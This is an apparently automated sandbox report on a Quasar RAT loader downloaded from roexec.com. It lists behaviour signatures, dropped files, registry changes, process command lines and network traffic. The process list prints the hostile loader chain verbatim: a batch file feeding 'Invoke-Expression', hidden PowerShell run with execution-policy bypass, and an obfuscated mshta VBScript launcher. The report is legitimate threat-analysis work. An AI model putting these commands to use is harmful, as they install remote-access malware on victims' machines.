Analysis Overview
Threat Level: Known bad
The file https://roexec.com/download/ was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Executes dropped EXE
Drops file in Windows directory
Enumerates physical storage devices
NTFS ADS
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Modifies registry class
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-14 22:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-14 22:36
Reported
2024-03-14 22:41
Platform
win11-20240221-en
Max time kernel
149s
Max time network
188s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3594324687-1993884830-4019639329-1000\{F2BBA89A-65B8-4FAE-B0BD-243481460955} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Loader.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://roexec.com/download/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9af3b3cb8,0x7ff9af3b3cc8,0x7ff9af3b3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1336 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=1980 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7012 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Loader.zip\Loader\Enjoy.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Loader\Loader\Loader.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:ZJTIOSSEPb; "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7472 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-zkGLsfyYwgpnqYSkdTvz4312:hibytKde=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-zkGLsfyYwgpnqYSkdTvz4312:hibytKde=%
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:aXOgUWVddS; "
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roexec.com | udp |
| US | 172.67.184.90:443 | roexec.com | tcp |
| US | 172.67.184.90:443 | roexec.com | tcp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 192.0.76.3:443 | stats.wp.com | tcp |
| US | 192.0.76.3:443 | stats.wp.com | tcp |
| US | 8.8.8.8:53 | pixel.wp.com | udp |
| US | 8.8.8.8:53 | 90.184.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.76.0.192.in-addr.arpa | udp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | tcp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | udp |
| GB | 92.123.128.133:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 92.123.128.133:443 | r.bing.com | tcp |
| GB | 92.123.128.133:443 | r.bing.com | tcp |
